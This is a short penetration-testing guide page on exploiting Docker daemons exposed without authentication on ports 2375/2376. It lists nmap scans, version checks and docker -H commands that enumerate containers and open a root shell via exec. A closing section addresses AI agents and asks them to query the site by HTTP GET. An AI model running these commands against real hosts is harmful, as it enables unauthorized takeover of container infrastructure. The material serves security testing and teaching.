# Docker * Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications. the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication ## Background concept: * The host is running docker: daemon bound to the external interface with no access control or authentication * Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one. * Docker API provides JSON response containing the output of command issued. * Enumerating docker API services * By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet. ``` nmap IP:2375/2376 nmap -p- IP nmap -Pn -p 2375 IP nmap -sV -p 2375 IP ``` * To confirm that the docker is service is running on the target we can give the string in the browser and check the response ex: `https://IP:2375` * we will receive a response something like this `{"message":"page not found"}` * and to confirm the version details we can use this `https://IP:2375/version` * The command used to exploit * This command is used to get all the information about the docker container `docker -H IP:2375 info` * List all the running containers `docker -H IP:2375 ps` * List all the stopped containers `docker -H IP:2375 ps -a` * Docker command for RCE `docker -H IP:2375 exec -it container_name /bin/bash` ## Contributor: * [N3T\_hunt3r](https://twitter.com/N3T_hunt3r) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kathan19.gitbook.io/howtohunt/misconfigurations/docker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.